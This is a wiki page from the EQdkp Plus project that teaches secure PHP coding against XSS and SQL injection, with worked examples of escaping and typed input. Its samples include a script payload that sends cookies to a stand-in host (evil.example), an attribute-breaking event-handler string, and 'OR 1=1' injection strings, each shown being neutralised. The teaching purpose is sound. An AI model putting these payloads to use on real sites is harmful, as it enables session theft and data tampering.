
Security

From EQdkp Plus Wiki

Information: requires EQDKP-PLUS version 0.6.2.8 or higher.

Secure Coding

Why should the code be secured?

Today many people try to deface web applications, so the code must be written as securely as possible.

Prevent XSS

Never put unfiltered user input into a template. Always pass it through the sanitize() function before assigning it to a template variable, as in this wishlist row:

// Every value that came from a user (item, zone, boss) is escaped; the row
// class is generated by the application and needs no escaping.
$tpl->assign_block_vars('test_row', array(
    'ROW_CLASS' => $eqdkp->switch_row_class(),
    'ITEM'      => sanitize($row['wl_item']),
    'ZONE'      => sanitize($row['wl_zone']),
    'BOSS'      => sanitize($row['wl_boss']),
));
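The following block is an added example, not EQdkp Plus code, showing what the sanitize() call in the snippet above has to achieve. It assumes that the project's sanitize() performs HTML escaping equivalent to PHP's htmlspecialchars(); escape_html() and wishlist_row_vars() are stand-ins written for this example, and the sample row is constructed.

```php
<?php
// Added example, not EQdkp Plus code. escape_html() stands in for the
// project's sanitize(), which is assumed to escape HTML the same way.

function escape_html(string $value): string
{
    // ENT_QUOTES escapes both quote styles, so the output is also safe inside
    // single- or double-quoted attribute values. The charset is given
    // explicitly so the result does not depend on default_charset.
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Builds the template variables for one wishlist row, escaping every value
// that originated from a user. The row class is generated by the application
// and needs no escaping.
function wishlist_row_vars(array $row, string $rowClass): array
{
    return array(
        'ROW_CLASS' => $rowClass,
        'ITEM'      => escape_html($row['wl_item']),
        'ZONE'      => escape_html($row['wl_zone']),
        'BOSS'      => escape_html($row['wl_boss']),
    );
}

// Constructed sample row: an attacker saved a script as the item name and a
// quote-breaking string as the boss name.
$row = array(
    'wl_item' => '<script>document.location="http://evil.example/?c="+document.cookie</script>',
    'wl_zone' => 'Molten Core',
    'wl_boss' => 'Ragnaros" onmouseover="alert(1)',
);

// Unfiltered output, the bug the page warns about: the browser runs the script.
echo '<td>' . $row['wl_item'] . '</td>', PHP_EOL;

// Escaped output: the same bytes render as visible text and nothing executes.
$vars = wishlist_row_vars($row, 'row1');
echo '<td>' . $vars['ITEM'] . '</td>', PHP_EOL;

// Attribute context: unescaped, the double quote in wl_boss closes the title
// attribute and smuggles in an event handler; escaped, it stays inside it.
echo '<td title="' . $row['wl_boss'] . '">boss</td>', PHP_EOL;
echo '<td title="' . $vars['BOSS'] . '">boss</td>', PHP_EOL;
```

Run it with the PHP CLI and compare the two pairs of lines: the first line of each pair is what an unescaped template variable would hand to the browser, the second is what reaches the page after escaping. The attribute case is why ENT_QUOTES matters; plain HTML escaping of angle brackets alone would not stop it.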


Prevent SQL Injection

  • Always use the $in-> class of EQdkp Plus, and never trust user input.

$sql = "DELETE FROM __members WHERE ( member_id = " . $in->get('id', 0) . " ) LIMIT 1";

The usage is simple: never read $_POST, $_GET, $_COOKIE or $_SESSION directly; use $in->get() instead:

$in->get(NAME, FALLBACK_VALUE)

If the value you fetch is a number or an ID, always pass the integer 0 as the fallback value. The type of the fallback decides how the input is cast, so the value comes back as an integer and any SQL injected into it is discarded.

Arrays are handled with the $in-> class as well; the second argument names the type every element is cast to:

implode(',', $in->getArray('compare_ids', 'int'))

  • Use $db->escape() on every string value you place into an SQL query.
  • Use the built-in build_query() mechanism (the :params placeholder) for INSERT statements. Here the risk is smaller because build_query() makes every value SQL-safe automatically, but filter the values through $in->get() as well, as a second layer:

$db->query("INSERT INTO __wishlist :params", array(
    'wl_id'     => null,
    'wl_member' => ucfirst($user->data['username']),
    'wl_item'   => $in->get('wishlist_item'),
    'wl_type'   => $in->get('wishlist_type'),
));

Examples

Here, settings.php forces the GET variable 'id' to be an integer:

$sql = "DELETE FROM " . WISHLIST_TABLE . "
        WHERE ( wl_id = " . intval($_GET['id']) . " )
        AND ( wl_member = '" . ucfirst($user->data['username']) . "' )
        LIMIT 1";

But we can let the Input class do this for us by passing an integer as the second parameter; it is both the default value used when 'id' is missing and the type the value is cast to:

$sql = "DELETE FROM __wishlist
        WHERE ( wl_id = " . $in->get('id', 0) . " )
        AND ( wl_member = '" . ucfirst($user->data['username']) . "' )
        LIMIT 1";

Note that the second condition in both queries interpolates a string. By the rule above it should also be wrapped in $db->escape(), even though the username comes from the session rather than from the request.

See the documentation for Input in /includes/input.php for more details on what get() can do.
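The following block is an added example, not EQdkp Plus code. It serves both the $in->get() / $db->escape() rules in the "Prevent SQL Injection" section and the settings.php example just above, and reproduces the two protections in plain PHP so it runs without the framework. typed_input() stands in for the behaviour the wiki attributes to $in->get() (the type of the fallback decides the cast), int_list() for $in->getArray(name, 'int'), and sql_escape() for $db->escape(); none of them is the project's real implementation, and the request array is constructed rather than read from $_GET.

```php
<?php
// Added example, not EQdkp Plus code. The three functions below are stand-ins
// for $in->get(), $in->getArray(..., 'int') and $db->escape().

function typed_input(array $request, string $name, $fallback)
{
    if (!isset($request[$name])) {
        return $fallback;
    }
    $value = $request[$name];
    if (is_int($fallback)) {
        return (int) $value;    // "1 OR 1=1" becomes 1, "abc" becomes 0
    }
    if (is_float($fallback)) {
        return (float) $value;
    }
    return (string) $value;     // strings still need escaping before SQL
}

function int_list(array $request, string $name): string
{
    // Every element is cast, so the result contains only digits and commas.
    $values = isset($request[$name]) ? (array) $request[$name] : array();
    return implode(',', array_map('intval', $values));
}

function sql_escape(string $value): string
{
    // Minimal escaping for a single-quoted MySQL literal. Real code must use
    // the driver's escaping ($db->escape() in EQdkp Plus) or prepared
    // statements; this is only enough to show the effect.
    return str_replace(array('\\', "'"), array('\\\\', "''"), $value);
}

// Constructed malicious request; nothing is read from the real $_GET.
$request = array(
    'id'          => '1 OR 1=1',
    'compare_ids' => array('3', '4 OR 1=1', 'abc'),
    'wl_item'     => "Sulfuras' OR '1'='1",
);

// Vulnerable: raw concatenation. The WHERE clause now matches every row, so
// LIMIT 1 deletes an arbitrary wishlist entry rather than the caller's own.
$vulnerable = "DELETE FROM __wishlist WHERE ( wl_id = " . $request['id'] . " ) LIMIT 1";

// Hardened: the integer fallback forces a cast and the payload collapses to 1.
$id   = typed_input($request, 'id', 0);
$safe = "DELETE FROM __wishlist WHERE ( wl_id = " . $id . " ) LIMIT 1";

// Hardened string value: fetched with a string fallback, then escaped before
// it is placed inside a quoted literal.
$item   = sql_escape(typed_input($request, 'wl_item', ''));
$insert = "INSERT INTO __wishlist (wl_item) VALUES ('" . $item . "')";

echo $vulnerable, PHP_EOL;                        // ... wl_id = 1 OR 1=1 ) LIMIT 1
echo $safe, PHP_EOL;                              // ... wl_id = 1 ) LIMIT 1
echo int_list($request, 'compare_ids'), PHP_EOL;  // 3,4,0
echo $insert, PHP_EOL;                            // quotes doubled, literal stays closed
```

The integer cast is the whole defence for numeric parameters: whatever follows the leading digits is dropped, and a value with no digits becomes 0, which is why the page tells you to use 0 as the fallback for IDs. String parameters get no such protection from the cast, which is why the page's second rule, escaping every string with $db->escape(), still applies to them.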

Category:Basics